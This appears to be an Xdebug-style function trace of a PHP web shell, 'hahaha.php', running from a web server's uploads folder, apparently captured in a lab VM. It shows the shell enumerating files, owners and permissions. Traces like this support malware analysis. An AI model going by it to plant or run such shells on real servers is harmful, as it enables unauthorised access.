4	88	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	89	0	0.017178	1520656	filemtime	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	1	'/var/www/html/uploads/.'
4	89	1	0.017194	1520712
4	89	R			1676246635
4	90	0	0.017208	1520624	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	2	'Y-m-d H:i:s'	1676246635
4	90	1	0.017241	1520952
4	90	R			'2023-02-12 19:03:55'
4	91	0	0.017255	1520928	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	910	1	'/var/www/html/uploads/.'
5	92	0	0.017270	1520928	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/.'
5	92	1	0.017287	1520968
5	92	R			TRUE
5	93	0	0.017300	1520928	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/.'
5	93	1	0.017320	1520968
5	93	R			TRUE
5	94	0	0.017333	1520928	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	'/var/www/html/uploads/.'
5	94	1	0.017347	1520968
5	94	R			16895
5	95	0	0.017360	1520928	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	16895
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	304	$i = 'd'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= 'x'
5	95	1	0.017476	1520968
5	95	R			'drwxrwxrwx'
4	91	1	0.017491	1521008
4	91	R			'<font color=#FFDB5F><b>drwxrwxrwx</b></font>'
4	96	0	0.017508	1521008	filesize	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	911	1	'/var/www/html/uploads/.'
4	96	1	0.017522	1521048
4	96	R			4096
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	913	$tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
4	97	0	0.017559	1521008	is_file	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	915	1	'/var/www/html/uploads/.'
4	97	1	0.017573	1521048
4	97	R			FALSE
4	98	0	0.017586	1521008	is_link	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	917	1	'/var/www/html/uploads/.'
4	98	1	0.017601	1521072
4	98	R			FALSE
4	99	0	0.017614	1521032	is_dir	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	919	1	'/var/www/html/uploads/.'
4	99	1	0.017629	1521072
4	99	R			TRUE
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i++
4	100	0	0.017653	1520984	fileowner	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	'..'
4	100	1	0.017668	1521008
4	100	R			0
4	101	0	0.017681	1520968	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	0
4	101	1	0.017705	1521768
4	101	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	102	0	0.017747	1521000	filegroup	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	'..'
4	102	1	0.017761	1521040
4	102	R			0
4	103	0	0.017774	1521000	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	0
4	103	1	0.017796	1521656
4	103	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	0	0.017833	1521520	filemtime	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	1	'/var/www/html/uploads/..'
4	104	1	0.017850	1521584
4	104	R			1676246635
4	105	0	0.017863	1521488	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	2	'Y-m-d H:i:s'	1676246635
4	105	1	0.017894	1521816
4	105	R			'2023-02-12 19:03:55'
4	106	0	0.017909	1521800	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	910	1	'/var/www/html/uploads/..'
5	107	0	0.017923	1521800	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/..'
5	107	1	0.017939	1521840
5	107	R			TRUE
5	108	0	0.017953	1521800	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/..'
5	108	1	0.017968	1521840
5	108	R			TRUE
5	109	0	0.017982	1521800	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	'/var/www/html/uploads/..'
5	109	1	0.017996	1521840
5	109	R			16895
5	110	0	0.018009	1521800	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	16895
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	304	$i = 'd'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= 'x'
5	110	1	0.018130	1521840
5	110	R			'drwxrwxrwx'
4	106	1	0.018145	1521880
4	106	R			'<font color=#FFDB5F><b>drwxrwxrwx</b></font>'
4	111	0	0.018162	1521880	filesize	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	911	1	'/var/www/html/uploads/..'
4	111	1	0.018177	1521920
4	111	R			4096
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	913	$tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
4	112	0	0.018213	1521056	is_file	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	915	1	'/var/www/html/uploads/..'
4	112	1	0.018228	1521096
4	112	R			FALSE
4	113	0	0.018241	1521056	is_link	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	917	1	'/var/www/html/uploads/..'
4	113	1	0.018258	1521104
4	113	R			FALSE
4	114	0	0.018271	1521064	is_dir	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	919	1	'/var/www/html/uploads/..'
4	114	1	0.018285	1521104
4	114	R			TRUE
4	115	0	0.018298	1521008	array_merge	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	920	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
4	115	1	0.018323	1521448
4	115	R			['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	920	$dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i++
4	116	0	0.018383	1521760	fileowner	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	'.htaccess'
4	116	1	0.018399	1521784
4	116	R			0
4	117	0	0.018412	1521744	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	0
4	117	1	0.018436	1522544
4	117	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	0	0.018478	1521776	filegroup	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	'.htaccess'
4	118	1	0.018492	1521816
4	118	R			0
4	119	0	0.018504	1521776	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	0
4	119	1	0.018527	1522432
4	119	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	120	0	0.018563	1522296	filemtime	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	1	'/var/www/html/uploads/.htaccess'
4	120	1	0.018580	1522352
4	120	R			1676246635
4	121	0	0.018593	1522256	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	2	'Y-m-d H:i:s'	1676246635
4	121	1	0.018625	1522584
4	121	R			'2023-02-12 19:03:55'
4	122	0	0.018639	1522568	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	910	1	'/var/www/html/uploads/.htaccess'
5	123	0	0.018654	1522568	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/.htaccess'
5	123	1	0.018670	1522608
5	123	R			TRUE
5	124	0	0.018683	1522568	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/.htaccess'
5	124	1	0.018702	1522608
5	124	R			FALSE
5	125	0	0.018716	1522568	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	323	1	'/var/www/html/uploads/.htaccess'
5	125	1	0.018730	1522608
5	125	R			33188
5	126	0	0.018743	1522568	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	323	1	33188
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	302	$i = '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= '-'
5	126	1	0.018859	1522608
5	126	R			'-rw-r--r--'
4	122	1	0.018873	1522648
4	122	R			'<font color=white><b>-rw-r--r--</b></font>'
4	127	0	0.018890	1522648	filesize	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	911	1	'/var/www/html/uploads/.htaccess'
4	127	1	0.018904	1522688
4	127	R			64
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	913	$tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']
4	128	0	0.018940	1522272	is_file	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	915	1	'/var/www/html/uploads/.htaccess'
4	128	1	0.018954	1522312
4	128	R			TRUE
4	129	0	0.018968	1522216	array_merge	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	916	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
4	129	1	0.018992	1522656
4	129	R			['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	916	$files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i++
4	130	0	0.019050	1522968	fileowner	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	'data'
4	130	1	0.019067	1522984
4	130	R			0
4	131	0	0.019079	1522944	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	0
4	131	1	0.019103	1523744
4	131	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	132	0	0.019145	1522976	filegroup	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	'data'
4	132	1	0.019159	1523016
4	132	R			0
4	133	0	0.019172	1522976	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	0
4	133	1	0.019194	1523632
4	133	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	134	0	0.019230	1523496	filemtime	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	1	'/var/www/html/uploads/data'
4	134	1	0.019246	1523560
4	134	R			1676246635
4	135	0	0.019260	1523464	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	2	'Y-m-d H:i:s'	1676246635
4	135	1	0.019291	1523792
4	135	R			'2023-02-12 19:03:55'
4	136	0	0.019306	1523776	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	910	1	'/var/www/html/uploads/data'
5	137	0	0.019320	1523776	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/data'
5	137	1	0.019337	1523816
5	137	R			TRUE
5	138	0	0.019350	1523776	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/data'
5	138	1	0.019370	1523816
5	138	R			TRUE
5	139	0	0.019384	1523776	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	'/var/www/html/uploads/data'
5	139	1	0.019398	1523816
5	139	R			16895
5	140	0	0.019411	1523776	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	16895
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	304	$i = 'd'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= 'x'
5	140	1	0.019527	1523816
5	140	R			'drwxrwxrwx'
4	136	1	0.019542	1523856
4	136	R			'<font color=#FFDB5F><b>drwxrwxrwx</b></font>'
4	141	0	0.019560	1523856	filesize	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	911	1	'/var/www/html/uploads/data'
4	141	1	0.019574	1523896
4	141	R			4096
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	913	$tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
4	142	0	0.019611	1523480	is_file	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	915	1	'/var/www/html/uploads/data'
4	142	1	0.019625	1523520
4	142	R			FALSE
4	143	0	0.019639	1523480	is_link	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	917	1	'/var/www/html/uploads/data'
4	143	1	0.019654	1523520
4	143	R			FALSE
4	144	0	0.019667	1523480	is_dir	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	919	1	'/var/www/html/uploads/data'
4	144	1	0.019681	1523520
4	144	R			TRUE
4	145	0	0.019694	1523424	array_merge	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	920	2	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
4	145	1	0.019719	1523864
4	145	R			['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	920	$dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i++
4	146	0	0.019778	1523800	fileowner	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	'hahaha.php'
4	146	1	0.019794	1523824
4	146	R			1000
4	147	0	0.019807	1523784	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	1000
4	147	1	0.019839	1524600
4	147	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	$ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	148	0	0.019882	1523832	filegroup	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	'hahaha.php'
4	148	1	0.019897	1523872
4	148	R			1000
4	149	0	0.019910	1523832	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	1000
4	149	1	0.019942	1524488
4	149	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	$gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	150	0	0.019978	1524368	filemtime	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	1	'/var/www/html/uploads/hahaha.php'
4	150	1	0.019995	1524432
4	150	R			1676246635
4	151	0	0.020008	1524328	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	2	'Y-m-d H:i:s'	1676246635
4	151	1	0.020044	1524656
4	151	R			'2023-02-12 19:03:55'
4	152	0	0.020059	1524648	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	910	1	'/var/www/html/uploads/hahaha.php'
5	153	0	0.020073	1524648	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/hahaha.php'
5	153	1	0.020090	1524688
5	153	R			TRUE
5	154	0	0.020103	1524648	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/hahaha.php'
5	154	1	0.020119	1524688
5	154	R			FALSE
5	155	0	0.020133	1524648	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	323	1	'/var/www/html/uploads/hahaha.php'
5	155	1	0.020147	1524688
5	155	R			33204
5	156	0	0.020160	1524648	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	323	1	33204
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	302	$i = '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= '-'
5	156	1	0.020276	1524688
5	156	R			'-rw-rw-r--'
4	152	1	0.020290	1524728
4	152	R			'<font color=white><b>-rw-rw-r--</b></font>'
4	157	0	0.020307	1524728	filesize	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	911	1	'/var/www/html/uploads/hahaha.php'
4	157	1	0.020321	1524768
4	157	R			71665
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	913	$tmp = ['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes']
4	158	0	0.020358	1524352	is_file	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	915	1	'/var/www/html/uploads/hahaha.php'
4	158	1	0.020372	1524392
4	158	R			TRUE
4	159	0	0.020385	1524288	array_merge	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	916	2	['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes']	['type' => 'file']
4	159	1	0.020409	1524728
4	159	R			['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	916	$files[] = ['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i++
4	160	0	0.020469	1524664	fileowner	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	'prepend.php'
4	160	1	0.020485	1524680
4	160	R			0
4	161	0	0.020497	1524640	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	0
4	161	1	0.020521	1525440
4	161	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	162	0	0.020563	1524656	filegroup	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	'prepend.php'
4	162	1	0.020578	1524696
4	162	R			0
4	163	0	0.020590	1524656	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	0
4	163	1	0.020612	1525312
4	163	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	164	0	0.020659	1525192	filemtime	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	1	'/var/www/html/uploads/prepend.php'
4	164	1	0.020676	1525256
4	164	R			1676246635
4	165	0	0.020690	1525152	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	909	2	'Y-m-d H:i:s'	1676246635
4	165	1	0.020727	1525480
4	165	R			'2023-02-12 19:03:55'
4	166	0	0.020742	1525472	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	910	1	'/var/www/html/uploads/prepend.php'
5	167	0	0.020757	1525472	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/prepend.php'
5	167	1	0.020774	1525512
5	167	R			TRUE
5	168	0	0.020787	1525472	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/prepend.php'
5	168	1	0.020803	1525512
5	168	R			FALSE
5	169	0	0.020817	1525472	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	323	1	'/var/www/html/uploads/prepend.php'
5	169	1	0.020831	1525512
5	169	R			33261
5	170	0	0.020844	1525472	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	323	1	33261
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	302	$i = '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= 'x'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= '-'
5		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= 'x'
5	170	1	0.020977	1525512
5	170	R			'-rwxr-xr-x'
4	166	1	0.020991	1525552
4	166	R			'<font color=white><b>-rwxr-xr-x</b></font>'
4	171	0	0.021008	1525552	filesize	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	911	1	'/var/www/html/uploads/prepend.php'
4	171	1	0.021023	1525592
4	171	R			57
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	913	$tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']
4	172	0	0.021060	1525176	is_file	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	915	1	'/var/www/html/uploads/prepend.php'
4	172	1	0.021074	1525216
4	172	R			TRUE
